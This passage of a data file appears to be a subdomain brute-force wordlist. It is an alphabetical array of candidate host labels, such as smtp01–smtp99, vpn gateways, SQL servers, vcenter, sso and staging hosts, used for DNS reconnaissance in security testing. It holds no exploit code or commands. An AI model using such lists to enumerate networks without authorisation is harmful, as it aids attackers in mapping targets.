"rome", "romeo", "romulus", "ron", "ronin", "roo", "roof", "rook", "room", "rooster", "root", "rootd", "rooted", "rosa", "rosalind", "rose", "rosebud", "rosemary", "rosetta", "rosie", "ross", "rossi", "rossini", "rouge", "route", "router", "router-e0", "router-i", "router-i0", "router-s0", "router-via-ctc", "router01", "router02", "router1", "router2", "router3", "router4", "router5", "routeur", "rover", "rowan", "rowlf", "roy", "royal", "rp", "rpc", "rplay", "rpm", "rproxy", "rps", "rptp", "rq", "rr", "rr1", "rr2", "rs", "rs01", "rs1", "rs2", "rs3", "rs4", "rsa", "rsc", "rsm", "rss", "rsync", "rt", "rt0", "rt01", "rt1", "rt2", "rt3", "rt4", "rtc", "rtelnet", "rtmp", "rtr", "rtr01", "rtr1", "rtr1-e0", "rtr2", "rts", "rtsp", "ru", "rubens", "rubicon", "rubidium", "rubin", "ruby", "rudi", "rufus", "rum", "rumba", "run", "rune", "runko-gw", "runner", "rupert", "rush", "russell", "rusty", "ruth", "ruthenium", "rutherford", "rv", "rw", "rwhois", "rx", "rx1", "ry", "ryan", "rye", "rz", "s", "s-0", "s0", "s0-0", "s0-1", "s00", "s01", "s02", "s03", "s04", "s05", "s06", "s07", "s08", "s09", "s1", "s1-0", "s1-1", "s10", "s11", "s12", "s13", "s14", "s15", "s16", "s17", "s18", "s19", "s2", "s2-0", "s20", "s21", "s22", "s23", "s24", "s25", "s26", "s27", "s28", "s29", "s2k-1", "s3", "s30", "s31", "s32", "s33", "s34", "s35", "s36", "s37", "s38", "s39", "s4", "s40", "s41", "s42", "s43", "s44", "s45", "s46", "s47", "s48", "s49", "s5", "s50", "s51", "s52", "s53", "s54", "s55", "s56", "s57", "s58", "s59", "s6", "s60", "s61", "s62", "s63", "s64", "s65", "s66", "s67", "s68", "s69", "s7", "s70", "s71", "s72", "s73", "s74", "s75", "s76", "s77", "s78", "s79", "s8", "s80", "s81", "s82", "s83", "s84", "s85", "s86", "s87", "s88", "s89", "s9", "s90", "s91", "s92", "s93", "s94", "s95", "s96", "s97", "s98", "s99", "sa", "sa1", "sa2", "saas", "saba", "saber", "sable", "sabre", "sabrina", "sac", "sack", "sacramento", "sad", "sadmin", "safari", "safe", "safety", "saffron", "saft", "saga", "sagan", "sage", "sagitta", "sagittarius", "sahara", "said", "sail", "saint", "saiph", "sakai", "sake", "sakura", "sal", "salamander", "sale", "salem", "sales", "sally", "salmon", "salsa", "salt", "saltlake", "sam", "samantha", "samara", "samarium", "samba", "sametime", "sammy", "samoa", "sample", "samples", "samson", "samsung", "samuel", "samurai", "samwise", "san", "san1", "san2", "sanantonio", "sand", "sandbox", "sandiego", "sandman", "sandra", "sandy", "sane", "sanfrancisco", "sanjose", "santa", "santana", "santiago", "sap", "sapgw", "saphir", "sapphire", "saprouter", "sar", "sara", "sarah", "saratoga", "sareplus", "saruman", "sas", "sasha", "saskatchewan", "sat", "satan", "satellite", "saturn", "saturne", "saturno", "sauron", "sav", "savage", "save", "saw", "say", "sb", "sb1", "sb2", "sbc", "sbc1", "sbs", "sbs1", "sbserver", "sc", "sc0", "sc1", "sc2", "sc3", "scache1", "scala", "scale", "scalix", "scan", "scan1", "scan2", "scandium", "scanner", "scanner01", "scarlet", "scc", "sccm", "schedule", "schedules", "schmidt", "schneider", "scholar", "school", "schools", "schroeder", "schubert", "sci", "science", "scissors", "scm", "sco", "scooby", "scoop", "scooter", "scope", "score", "scores", "scorpio", "scorpion", "scorpius", "scotland", "scott", "scotty", "scout", "scp", "scratch", "scratchy", "screen", "screw", "scribe", "script", "scripts", "scrooge", "scs", "scully", "sculptor", "scutum", "scylla", "sd", "sd-gw", "sd1", "sd2", "sdc", "sdp1", "sds", "sdsl", "se", "se1", "se1-0", "sea", "seagull", "seahorse", "seal", "sean", "search", "search1", "search2", "search6", "seat", "seattle", "sebastian", "sec", "sec1", "sec2", "secmail", "second", "secondary", "secondary-router", "secret", "secretaria", "secretary", "section", "secure", "secure1", "secure2", "secure3", "secure4", "secure5", "secured", "secureftp", "securemail", "securid", "security", "sedna", "see", "seed", "seek", "seeweb-gw", "seguro", "sekretariat", "sel", "select", "selene", "selenium", "self", "selfservice", "selma", "sem", "seminar", "sems", "sen", "send", "send1", "send2", "sender", "sendmail", "seneca", "senior", "senna", "sense", "sensible", "sensor", "sentinel", "sentry", "seo", "seoul", "sep", "separate", "sequoia", "ser", "ser0", "ser1", "seraph", "serena", "serenity", "sergio", "seri", "serial", "serial0", "serial0-0", "serial0-1", "serial1-0", "serial2-0", "serial3-0", "serious", "serpens", "serv", "serv01", "serv02", "serv1", "serv2", "serv3", "serv4", "serv5", "serval", "serve", "server", "server-1", "server-2", "server0", "server01", "server02", "server03", "server04", "server05", "server06", "server07", "server08", "server09", "server1", "server10", "server11", "server12", "server13", "server14", "server15", "server16", "server17", "server18", "server19", "server2", "server20", "server21", "server22", "server23", "server24", "server25", "server26", "server27", "server28", "server29", "server3", "server30", "server31", "server32", "server33", "server34", "server35", "server36", "server37", "server38", "server39", "server4", "server40", "server41", "server42", "server43", "server44", "server45", "server46", "server47", "server48", "server49", "server5", "server50", "server51", "server52", "server53", "server54", "server55", "server56", "server57", "server6", "server60", "server7", "server8", "server9", "servermail", "servers", "serveur", "serveur1", "service", "service1", "service2", "service3", "servicedesk", "services", "services1", "services2", "servicio", "servicios", "servidor", "servidor1", "servidor2", "servis", "servizi", "serwer", "ses", "sesame", "session", "set", "seth", "setup", "seurat", "seven", "sex", "seymour", "sf", "sf1", "sf2", "sfa", "sfs", "sft", "sftp", "sfx", "sg", "sg1", "sg2", "sgi", "sgs", "sgw", "sh", "sh1", "sh2", "sha", "shade", "shadow", "shadowfax", "shaggy", "shake", "shaman", "shanghai", "shannon", "shape", "shaper", "share", "shared", "shared1", "sharepoint", "shareware", "shark", "sharon", "sharp", "shasta", "shaun", "shaw", "sheep", "sheet", "shelby", "sheldon", "shell", "shell1", "shelley", "shells", "shelob", "shemp", "sherlock", "sherman", "sherry", "shib", "shibboleth", "shield", "shift", "shine", "ship", "shipping", "shiraz", "shire", "shirley", "shiva", "shock", "shop", "shop1", "shop2", "shoppers", "shopping", "shorty", "show", "shrek", "shrike", "shrimp", "shs", "shu", "shuttle", "si", "sia", "sibelius", "sic", "sid", "sidn2", "siebel", "siemens", "sienna", "sierra", "sieve", "sif", "sig", "siga", "sight", "sigma", "sign", "signal", "signin", "signup", "sil", "silc", "silent", "silicon", "silk", "silo", "silver", "silvia", "sim", "simba", "simon", "simone", "simple", "simpson", "sims", "sin", "single", "sink", "sinope", "sioux", "sip", "sip-tls", "sip01", "sip1", "sip2", "sip3", "sir", "siren", "sirio", "sirius", "sis", "sisko", "sistemas", "sister", "sisyphus", "sit", "site", "site1", "sitebuilder", "sites", "six", "sixxs", "sixxs-gw", "sj", "sk", "skadi", "skate", "skill", "skinner", "skipper", "skippy", "skkserv", "sklep", "skuld", "skunk", "sky", "skye", "skylark", "skyline", "skynet", "skywalker", "skyward", "sl", "sl1", "sla", "slackware", "slash", "slate", "slave", "slave1", "slave2", "slc", "sleep", "sleepy", "sleet", "slice", "slim", "slip", "slis", "slmail", "sloth", "slow", "slug", "sm", "sm1", "sm2", "sm3", "sma", "sma1", "smail", "smail01", "small", "smart", "smarthost", "smaug", "smb", "smc", "sme", "smeagol", "smf", "smg", "smile", "smith", "smithers", "sml", "smoke", "smokeping", "smokey", "smooth", "smp", "sms", "sms1", "sms2", "smsqp", "smt", "smtp", "smtp-01", "smtp-1", "smtp-2", "smtp-gw", "smtp-in", "smtp-out", "smtp-out1", "smtp-out2", "smtp-relay", "smtp0", "smtp01", "smtp02", "smtp03", "smtp04", "smtp05", "smtp06", "smtp07", "smtp08", "smtp09", "smtp1", "smtp10", "smtp11", "smtp12", "smtp13", "smtp14", "smtp15", "smtp16", "smtp17", "smtp18", "smtp19", "smtp2", "smtp20", "smtp21", "smtp22", "smtp23", "smtp24", "smtp25", "smtp26", "smtp27", "smtp28", "smtp29", "smtp3", "smtp30", "smtp31", "smtp32", "smtp33", "smtp34", "smtp35", "smtp36", "smtp37", "smtp38", "smtp39", "smtp4", "smtp40", "smtp41", "smtp42", "smtp43", "smtp44", "smtp45", "smtp46", "smtp47", "smtp48", "smtp49", "smtp5", "smtp50", "smtp51", "smtp52", "smtp53", "smtp54", "smtp55", "smtp56", "smtp57", "smtp58", "smtp59", "smtp6", "smtp60", "smtp61", "smtp62", "smtp63", "smtp64", "smtp65", "smtp66", "smtp67", "smtp68", "smtp69", "smtp7", "smtp70", "smtp71", "smtp72", "smtp73", "smtp74", "smtp75", "smtp76", "smtp77", "smtp78", "smtp79", "smtp8", "smtp80", "smtp81", "smtp82", "smtp83", "smtp84", "smtp85", "smtp86", "smtp87", "smtp88", "smtp89", "smtp9", "smtp90", "smtp91", "smtp92", "smtp93", "smtp94", "smtp95", "smtp96", "smtp97", "smtp98", "smtp99", "smtpa", "smtpauth", "smtpgate", "smtpgw", "smtpgw2", "smtphost", "smtpin", "smtpmail", "smtpmailer", "smtpout", "smtpout1", "smtpout2", "smtprelay", "smtps", "smurf", "smux", "sn", "snail", "snake", "snap", "snapper", "sndr1", "sndr2", "sndv-pts01", "sndv-pts02", "sndv-pts03", "sndv-pts04", "sneezy", "sniffer", "snipe", "sniper", "snmp", "snmp-trap", "snmpd", "snoopy", "snort", "snow", "snowball", "snowwhite", "snowy", "snpp", "sns", "so", "so-0-0-0", "so-0-0-1", "so-0-1-0", "so-1-0-0", "so-2-0-0", "soa", "soap", "sobek", "soc", "socal", "social", "society", "socios", "socks", "socrates", "soda", "sodium", "sofia", "soft", "software", "sogo", "soho", "sokrates", "sol", "solar", "solaris", "solarwinds", "sole", "soleil", "solid", "soliton", "solo", "solomon", "solr", "solstice", "solution", "solutions", "soma", "some", "something", "son", "sonar", "sonata", "song", "songs", "sonia", "sonic", "sonicwall", "sonne", "sonny", "sony", "sophia", "sophie", "sophos", "soporte", "sorry", "sort", "sos", "soul", "sound", "soup", "sour", "source", "sourcecode", "sourcesafe", "south", "southcarolina", "southdakota", "southeast", "southwest", "sp", "sp-pod", "sp-pod2", "sp0", "sp01", "sp1", "sp2", "sp3", "spa", "space", "spacewalk", "spade", "spain", "spam", "spam1", "spam2", "spamd", "spamfilter", "spamtitan", "spamwall", "spanky", "sparc", "spare", "spare1", "spare2", "spare3", "spark", "sparkle", "sparks", "sparky", "sparrow", "sparta", "spartacus", "spartan", "spawn", "spb", "spc", "special", "spectra", "spectra01", "spectra02", "spectre", "spectrum", "speech", "speed", "speedtest", "speedy", "spencer", "sphere", "sphinx", "spica", "spice", "spider", "spiderman", "spike", "spin", "spinner", "spiral", "spirit", "spitfire", "spl", "splash", "splendid", "splinter", "splunk", "spm", "spock", "spokane", "sponcer", "sponge", "spongebob", "spooky", "spool", "spoon", "sport", "sports", "spot", "spring", "springfield", "sprint", "sprite", "sprocket", "spruce", "sps", "spss", "spud", "sputnik", "spy", "sq", "sqa", "sql", "sql0", "sql01", "sql02", "sql1", "sql2", "sql3", "sql4", "sql7", "sqlserver", "sqlsvr", "sqlsvr2", "squall", "square", "squash", "squid", "squid1", "squirrel", "squirrelmail", "sr", "sr01", "sr1", "sr2", "src", "srm", "srp1-0", "srp1-1", "srs", "srv", "srv-mail", "srv0", "srv01", "srv02", "srv03", "srv04", "srv05", "srv06", "srv07", "srv08", "srv09", "srv1", "srv10", "srv11", "srv12", "srv13", "srv14", "srv15", "srv16", "srv17", "srv18", "srv19", "srv1a", "srv2", "srv20", "srv21", "srv22", "srv23", "srv24", "srv25", "srv26", "srv27", "srv28", "srv29", "srv3", "srv30", "srv4", "srv5", "srv6", "srv7", "srv8", "srv9", "srvmail", "ss", "ss1", "ss2", "ssa", "ssb", "ssc", "ssd", "ssh", "ssh1", "ssh2", "ssl", "ssl-vpn", "ssl0", "ssl01", "ssl1", "ssl2", "ssl3", "ssl4", "sslbk", "sslvpn", "ssmtp", "sso", "ssp", "sss", "st", "st01", "st1", "st2", "st3", "st4", "sta", "stable", "stack", "staff", "staff1", "staff2", "stage", "stage01", "stage1", "stage2", "staging", "staging1", "staging2", "stalker", "stamp", "stan", "stand", "standard", "standby", "stanley", "star", "star-gw", "star2", "starbuck", "stardust", "starfish", "stargate", "stargazer", "stark", "starlight", "starling", "stars", "starscream", "start", "stat", "stat1", "state", "static", "static1", "static10", "static11", "static12", "static13", "static15", "static2", "static3", "static4", "static5", "static54", "static6", "static7", "static8", "static9", "station", "station1", "station10", "station11", "station12", "station13", "station14", "station15", "station16", "station17", "station18", "station19", "station2", "station20", "station21", "station22", "station23", "station24", "station25", "station26", "station27", "station28", "station29", "station3", "station30", "station31", "station32", "station33", "station34", "station35", "station36", "station37", "station38", "station39", "station4", "station40", "station41", "station42", "station43", "station44", "station45", "station46", "station47", "station48", "station49", "station5", "station50", "station51", "station52", "station53", "station54", "station55", "station56", "station57", "station58", "station59", "station6", "station60", "station61", "station62", "station63", "station64", "station65", "station66", "station67", "station68", "station69", "station7", "station70", "station71", "station72", "station73", "station74", "station75", "station76", "station77", "station78", "station79", "station8", "station80", "station81", "station82", "station83", "station84", "station85", "station86", "station87", "station88", "station89", "station9", "station90", "station91", "station92", "station93", "station94", "station95", "station96", "station97", "station98", "station99", "statistics", "statistik", "statler", "stats", "stats1", "stats2", "status", "stc", "std", "steady", "stealth", "steam", "steel", "stefan", "stein", "stella", "stem", "step", "stephen", "sterling", "stern", "steve", "steven", "stewart", "stewie", "stg", "sti", "stick", "still", "stimpy", "sting", "stinger", "stingray", "stinky", "stitch", "stlouis", "stm", "sto-cr1", "sto-cr2", "sto-cr3", "stock", "stockholm", "stokes", "stone", "stop", "storage", "storage01", "storage1", "storage2", "store", "store1", "store2", "storefront", "stores", "stork", "storm", "story", "stout", "str", "straight", "strange", "strategy", "stratus", "strauss", "strawberry", "stream", "stream01", "stream1", "stream2", "stream3", "stream4", "stream5", "streamdb", "streamdb2", "streamer", "streaming", "streams", "street", "strength", "stress", "stretch", "strider", "string", "strong", "stronghold", "strongmail", "strontium", "structure", "sts", "sts1", "sts2", "sts3", "stu", "stuart", "stud", "student", "student1", "student2", "student3", "student4", "students", "studio", "study", "stuff", "stun", "stuttgart", "style", "styx", "su", "sub", "sub1", "sub2", "subaru", "subject", "sublocalnode", "submission", "submit", "subnet", "subscribe", "subversion", "success", "successful", "suche", "sudo", "sue", "sufficient", "sugar", "sulfur", "sullivan", "sulu", "sumatra", "summer", "summit", "sun", "sun0", "sun01", "sun02", "sun1", "sun2", "sun3", "sunfire", "sunfish", "sunflower", "sunlight", "sunny", "sunray", "sunrise", "sunrpc", "sunset", "sunshine", "sunspot", "sup", "supdup", "super", "superior", "superman", "supernova", "superstar", "supervision", "supfiledbg", "supfilesrv", "suporte", "supplier", "suppliers", "supply", "support", "support-1", "support-2", "support1", "support2", "support3", "supra", "supreme", "sur01", "sure", "surf", "surface", "surfer", "surprise", "survey", "surveyor", "surveys", "surya", "sus", "susan", "suse", "sushi", "susi", "suucp", "suzuki", "sv", "sv01", "sv02", "sv03", "sv04", "sv1", "sv10", "sv11", "sv2", "sv3", "sv4", "sv5", "sv6", "sv7", "svc", "sven", "svn", "svr", "svr01", "svr02", "svr1", "svr2", "svr3", "svr4", "svr5", "sw", "sw-1", "sw-core1", "sw0", "sw01", "sw02", "sw03", "sw04", "sw1", "sw10", "sw11", "sw2", "sw3", "sw4", "sw5", "sw6", "sw7", "sw8", "swallow", "swan", "swat", "sweden", "sweet", "swg", "swg-proxy", "swift", "swim", "swing", "swis", "swiss", "switch", "switch0", "switch01", "switch02", "switch1", "switch2", "switch3", "switch4", "switch5", "switch6", "switch7", "switzerland", "sword", "swordfish", "sx", "sy", "sybase", "sycamore", "syd", "sydney", "syllabus", "sylvester", "sylvia", "symbol", "sympa", "symphony", "syn", "synapse", "sync", "synergy", "syntax", "sys", "sys1", "sys2", "sys3", "sys4", "sys5", "sysadmin", "sysback", "syslog", "syslog1", "syslogs", "sysmon", "sysrqd", "systat", "system", "system1", "system2", "system3", "systems", "sz", "szerver1", "szerver2", "szerver3", "szerver4", "szerver5", "t", "t0", "t1", "t10", "t11", "t2", "t20", "t3", "t4", "t5", "t6", "t7", "t8", "ta", "table", "tablet", "tac", "tacacs", "tacacs-ds", "tachyon", "taco", "tacoma", "tag", "tahiti", "tahoe", "tai", "tail", "taiwan", "take", "talent", "talisker", "talk", "tall", "talon", "talos", "tam", "tama", "tamara", "tampa", "tan", "tandberg", "tandem", "tang", "tangent", "tangerine", "tango", "tank", "tantalum", "tanya", "tao", "tap", "tape", "tar", "tara", "tarantula", "tardis", "target", "tarsier", "tartarus", "tarzan", "tas", "task", "tatooine", "tau", "taurus", "tax", "taylor", "taz", "tb", "tc", "tc1", "tc2", "tcl", "tcpmux", "tcs", "td", "te", "te-1-1", "te-1-2", "te-1-3", "te-2-1", "te-2-2", "te-3-1", "te0-1", "te1-1", "te1-2", "te1-3", "te1-4", "te2-1", "te2-2", "te2-3", "te2-4", "te3-1", "te3-2", "te3-3", "te3-4", "te4-1", "te4-2", "te4-3", "te4-4", "te7-1", "te7-2", "te8-1", "tea", "teach", "teacher", "teaching", "teak", "teal", "team", "teams", "teamspeak", "tec", "tech", "tech1", "tech2", "techno", "technology", "techsupport", "ted", "teddy", "tek", "tel", "tele", "telecom", "telephone", "telephony", "telesto", "television", "telhosting", "tellurium", "tellus", "telnet", "telnets", "tem", "temp", "temp1", "temp2", "temp3", "temp4", "temp5", "tempest", "template", "temple", "tempo", "tempus", "tempus1", "ten", "ten01", "ten02", "ten03", "ten1-0-0", "ten1-1", "ten1-49", "tengig1-1", "tennessee", "tenngig1-49", "tennis", "tense", "tequila", "tera", "teredo", "teredo-gw", "teredo-relay", "teresa", "term", "term1", "term2", "terminal", "terminalserver", "terminator", "terminus", "termserv", "terra", "terror", "terry", "tesla", "test", "test-www", "test0", "test01", "test02", "test03", "test04", "test1", "test10", "test11", "test12", "test2", "test2k", "test3", "test4", "test5", "test6", "test6www", "test7", "test8", "test9", "testajax", "testasp", "testaspnet", "testbed", "testbox", "testcf", "teste", "tester", "testing", "testip6", "testipv6", "testjsp", "testlab", "testlinux", "testmail", "testpc", "testphp", "testportal", "testserver", "testsite", "testsql", "testweb", "testwww", "testxp", "tethys", "tetra", "tex", "texas", "text", "tf", "tfido", "tfs", "tftp", "tftp1", "tg", "tge-1-1", "tge1-1", "tge17-10", "tge18-10", "tge7-1", "tge7-2", "tge8-1", "tge8-2", "tge8-3", "tge8-4", "tge8-5", "tge9-1", "tge9-2", "tge9-3", "tge9-4", "th", "thailand", "thalassa", "thales", "thalia", "thallium", "thames", "thanatos", "thankful", "that", "the", "thebe", "theia", "themis", "theo", "theoden", "theory", "thermo", "theseus", "theta", "thetis", "thewall", "thick", "thing", "think", "thinkpad", "thinktank", "this", "thistle", "thomas", "thompson", "thomson", "thor", "thorin", "thorium", "thot", "thoth", "thread", "three", "thrill", "thumper", "thunder", "thunderbird", "thunderbolt", "thyme", "ti", "tiamat", "tiberius", "tic", "tick", "ticket", "tickets", "tide", "tienda", "tiger", "tigger", "tigre", "tigris", "tilt", "tim", "time", "time-clock", "time1", "time2", "timeclock", "timed", "timesheet", "timmy", "timon", "tin", "tina", "tinc", "tintin", "tiny", "tip", "tis", "titan", "titan2", "titania", "titanic", "titanium", "title", "titus", "tivoli", "tj", "tk", "tl", "tla-dslam1", "tlc", "tls", "tm", "tm1", "tmail", "tmg", "tmp", "tms", "tn", "tns", "tnt", "tnt1", "tnt2", "tnt3", "tnt4", "tnt5", "tnt6", "to", "toad", "toast", "toaster", "toby", "tock", "today", "todd", "toe", "token", "tokyo", "toledo", "tom", "tomas", "tomato", "tomcat", "tommy", "tomocha", "tone", "tonga", "tony", "tool", "tool1", "toolbox", "tools", "top", "top1", "topaz", "topic", "toplayer", "tor", "torch", "tori", "torino", "tornado", "toro", "toronto", "torrent", "torres", "tosca", "toshiba", "total", "toto", "totoro", "toucan", "touch", "tour", "tower", "town", "toy", "toyota", "tp", "tproxy", "tps", "tq", "tr", "tr1", "tra", "trac", "trace", "trace2", "tracer", "track", "tracker", "tracker0", "tracking", "trackit", "tracy", "trade", "trading", "traffic", "train", "trainer", "training", "trans", "trans1", "transfer", "transfers", "transform", "transit", "translate", "transport", "trantor", "trap", "travel", "traveler", "tree", "trek", "trend", "trex", "tri", "trial", "triangle", "trick", "trident", "trigger", "trillian", "trinidad", "trinity", "trio", "trip", "tristan", "triton", "triumph", "trixbox", "trn1-iana", "trogdor", "troi", "troll", "tron", "troubadix", "trouble", "trout", "troy", "truck", "true", "trumpet", "trust", "truth", "try", "ts", "ts-01", "ts01", "ts02", "ts03", "ts1", "ts1-e0", "ts2", "ts3", "ts4", "ts5", "ts6", "tsa", "tse", "tserv1", "tserver", "tsg", "tsm", "tss", "tst", "tsunami", "tsv01", "tsv02", "tsweb", "tt", "ttc", "tts", "tu", "tu-0", "tu0", "tu1", "tu2", "tu3", "tu5", "tuba", "tube", "tucana", "tucker", "tucows", "tucson", "tulip", "tulsa", "tun0", "tuna", "tundra", "tungsten", "tunnel", "tunnel1", "tunnel2", "tunnelbroker", "turbo", "turin", "turing", "turkey", "turn", "turner", "turquoise", "turtle", "tutor", "tutortrac", "tuvok", "tux", "tv", "tv1", "tw", "twcc", "tweety", "twenty", "twiki", "twilight", "twin", "twins", "twist", "twister", "two", "tx", "tx1", "ty", "tyche", "tycho", "tyler", "typhon", "typhoon", "typo3", "tyr", "tz", "u", "u1", "u10", "u11", "u12", "u13", "u14", "u15", "u16", "u17", "u18", "u19", "u2", "u20", "u21", "u22", "u23", "u24", "u25", "u26", "u27", "u28", "u29", "u3", "u30", "u31", "u32", "u33", "u34", "u35", "u36", "u37", "u38", "u39", "u4", "u40", "u41", "u42", "u43", "u44", "u45", "u46", "u47", "u48", "u49", "u5", "u50", "u51", "u52", "u53", "u54", "u55", "u56", "u57", "u58", "u59", "u6", "u60", "u61", "u62", "u63", "u64", "u65", "u66", "u67", "u68", "u69", "u7", "u70", "u71", "u72", "u73", "u74", "u75", "u76", "u77", "u78", "u79", "u8", "u80", "u81", "u82", "u83", "u84", "u85", "u86", "u87", "u88", "u89", "u9", "u90", "u91", "u92", "u93", "u94", "u95", "u96", "u97", "u98", "u99", "ua", "uag", "uat", "uat2", "ub", "ubr01", "ubuntu", "uc", "ud", "uddi", "ue", "ueqam01a", "ueqam01b", "uer01", "uer02", "uf", "ufo", "ug", "uh", "uhf", "uhura", "ui", "uj", "uk", "uk1", "uk2", "ul", "ulistserv", "ultimate", "ultra", "ultracopier", "ulysse", "ulysses", "um", "umbriel", "ums", "un", "unallocated", "unassigned", "uncritical", "undernet-gw", "uni", "unicorn", "uniform", "union", "unique", "unit", "united", "unitedkingdom", "unitedstates", "unity", "universal", "universe", "university", "unix", "unixware", "unknown", "uno", "untrust", "unused", "unused-ip", "unusual", "uo", "up", "up0-dc", "up1-dc", "update", "updates", "upgrade", "uplink", "upload", "uploads", "upp-cr1", "ups", "ups0", "ups01", "ups1", "ups2", "ups3", "upsilon", "uq", "ur", "ur01", "ur02", "ur03", "ur04", "ural", "uran", "urania", "uranium", "urano", "uranos", "uranus", "urban", "urchin", "urd", "ursa", "ursula", "ursus", "us", "us1", "us2", "us3", "usa", "use", "useful", "usenet", "user", "user-pc", "user1", "user10", "user11", "user12", "user13", "user14", "user15", "user16", "user17", "user18", "user19", "user2", "user20", "user21", "user22", "user23", "user24", "user25", "user26", "user27", "user28", "user29", "user3", "user30", "user31", "user32", "user33", "user34", "user35", "user36", "user37", "user38", "user39", "user4", "user40", "user41", "user42", "user43", "user44", "user45", "user46", "user47", "user48", "user49", "user5", "user50", "user51", "user52", "user53", "user54", "user55", "user56", "user57", "user58", "user59", "user6", "user60", "user61", "user62", "user63", "user64", "user65", "user66", "user67", "user68", "user69", "user7", "user70", "user71", "user72", "user73", "user74", "user75", "user76", "user77", "user78", "user79", "user8", "user80", "user81", "user82", "user83", "user84", "user85", "user86", "user87", "user88", "user89", "user9", "user90", "user91", "user92", "user93", "user94", "user95", "user96", "user97", "user98", "user99", "users", "usr", "usr1", "usv01", "ut", "utah", "util", "util1", "utilities", "utility", "utm", "utopia", "uu", "uucp", "uucp-path", "uunet-gw", "uv", "uw", "ux", "uy", "uz", "v", "v0", "v01", "v1", "v10", "v11", "v12", "v13", "v14", "v15", "v16", "v17", "v18", "v19", "v2", "v20", "v21", "v22", "v23", "v25", "v27", "v3", "v32", "v4", "v5", "v50", "v6", "v6gw", "v6www", "v7", "v8", "v9", "va", "vaak", "vab-core-1", "vab2-core-1", "vacant", "vader", "vaio", "val", "valencia", "valhalla", "vali", "valiant", "valinor", "valkyrie", "valuable", "value", "vampire", "van", "vanadium", "vancouver", "vanessa", "vangogh", "vanguard", "vanilla", "vantive", "vapor", "var", "vas", "vault", "vb", "vboxd", "vc", "vc01", "vc1", "vc2", "vcenter", "vci", "vci2", "vcma", "vconf", "vcs", "vcse", "vd", "vdi", "vdr", "vds", "vds1", "vds2", "ve", "ve1", "ve10", "ve11", "ve12", "ve15", "ve2", "ve3", "ve30", "ve5", "ve8", "vector", "vectra", "vega", "vegas", "vela", "velocity", "vend", "vending", "vendor", "vendors", "venere", "venice", "venom", "ventas", "venus", "venus2", "vera", "verde", "verdi", "verify", "veritas", "vermeer", "vermont", "verona", "veronica", "vertigo", "verwaltung", "very", "vespa", "vespa1", "vesta", "vf", "vg", "vgate", "vgw", "vh", "vh1", "vh2", "vhf", "vhost", "vhost1", "vhost2", "vhost3", "vhost4", "vhosts", "vi", "via", "vic", "vicky", "victor", "victoria", "victory", "vid", "vidar", "vidconf", "video", "video1", "video2", "video3", "video6", "videoconf", "videoconference", "videos", "videoserver", "vienna", "view", "vig", "viking", "village", "vincent", "viola", "violet", "violin", "vip", "vip00", "vip01", "vip02", "vip03", "vip04", "vip05", "vip06", "vip07", "vip08", "vip09", "vip1", "vip10", "vip11", "vip12", "vip13", "vip14", "vip15", "vip16", "vip17", "vip18", "vip19", "vip2", "vip20", "vip21", "vip22", "vip23", "vip24", "vip25", "vip26", "vip27", "vip28", "vip29", "vip3", "vip30", "vip31", "vip32", "vip33", "vip34", "vip35", "vip36", "vip37", "vip38", "vip39", "viper", "vipgw", "vir", "virgil", "virginia", "virgo", "virt", "virt1", "virt2", "virtual", "virtual-circuit", "virtual-circuit2", "virtual1", "virtual2", "virtual3", "virus", "viruswall", "vis", "visa", "vishnu", "visio", "vision", "visit", "visitor", "visitor1", "vista", "visual", "vita", "vital", "viva", "vivaldi", "vivian", "vj", "vk", "vks", "vl", "vl-2", "vl-6", "vl1", "vl10", "vl100", "vl101", "vl102", "vl11", "vl12", "vl2", "vl20", "vl3", "vl31", "vl4", "vl5", "vl50", "vl6", "vl6-at", "vl7", "vlad", "vladimir", "vlan", "vlan-100", "vlan1", "vlan10", "vlan100", "vlan101", "vlan11", "vlan12", "vlan13", "vlan2", "vlan20", "vlan21", "vlan3", "vlan4", "vlan40", "vlan5", "vlan50", "vlan6", "vlan7", "vlan8", "vlan9", "vle", "vm", "vm0", "vm01", "vm02", "vm03", "vm04", "vm05", "vm06", "vm07", "vm1", "vm10", "vm11", "vm12", "vm13", "vm14", "vm2", "vm3", "vm4", "vm5", "vm6", "vm7", "vm8", "vm9", "vma", "vmail", "vmhost", "vmhost01", "vmhost1", "vmm", "vms", "vms1", "vmserver", "vmtest", "vmware", "vmware1", "vmware2", "vmware3", "vn", "vnc", "vnetd", "vo", "vod", "vodka", "voice", "voicemail", "void", "voip", "voip-gw", "voip01", "voip1", "voip2", "voip3", "voip4", "voipsys", "voipsys2", "voir", "volans", "volcano", "volga", "volt", "volta", "voltaire", "volume", "volvo", "voodoo", "vopied", "vortex", "vostok", "vote", "vox", "voyage", "voyager", "vp", "vpi", "vpi2", "vpn", "vpn-1", "vpn-2", "vpn-gw", "vpn0", "vpn01", "vpn02", "vpn03", "vpn04", "vpn05", "vpn06", "vpn1", "vpn10", "vpn11", "vpn12", "vpn13", "vpn14", "vpn15", "vpn16", "vpn17", "vpn18", "vpn19", "vpn2", "vpn20", "vpn21", "vpn22", "vpn23", "vpn24", "vpn25", "vpn26", "vpn28", "vpn3", "vpn30", "vpn4", "vpn5", "vpn6", "vpn7", "vpn8", "vpn9", "vpngate", "vpngw", "vpnserver", "vpnssl", "vpntest", "vps", "vps01", "vps02", "vps03", "vps1", "vps10", "vps11", "vps12", "vps2", "vps3", "vps4", "vps5", "vps6", "vps7", "vps8", "vps9", "vq", "vr", "vr1", "vrrp", "vs", "vs01", "vs02", "vs1", "vs2", "vs3", "vs4", "vs5", "vserv", "vserver", "vserver1", "vserver2", "vsp", "vsphere", "vss", "vt", "vtc", "vu", "vulcan", "vulcano", "vulture", "vv", "vw", "vweb", "vwww01", "vx", "vy", "vz", "vz1", "vz2", "w", "w-03", "w-04", "w0", "w01", "w02", "w03", "w1", "w10", "w11", "w12", "w13", "w14", "w15", "w16", "w17", "w18", "w19", "w2", "w20", "w21", "w22", "w23", "w24", "w25", "w26", "w27", "w28", "w2k3", "w3", "w31", "w32", "w35", "w3cache", "w4", "w5", "w6", "w7", "w8", "w9", "wa", "wagner", "wais", "waldo", "waldorf", "walk", "walker", "wall", "wallaby", "wallace", "wallet", "wally", "walnut", "walrus", "walter", "wam", "wan", "wan1", "wan2", "wanda", "wang", "wap", "wap1", "wap2", "war", "ward", "warehouse", "warhol", "warlock", "warlord", "warp", "warren", "warrior", "warsaw", "warthog", "was", "wasabi", "wash", "washington", "wasp", "watch", "watchdog", "watcher", "water", "watson", "watt", "wave", "waves", "wax", "way", "wayne", "wb", "wbm0", "wbm1", "wc", "wc3", "wcs", "wd", "wd1", "wd10", "wd11", "wd12", "wd13", "wd14", "wd15", "wd16", "wd17", 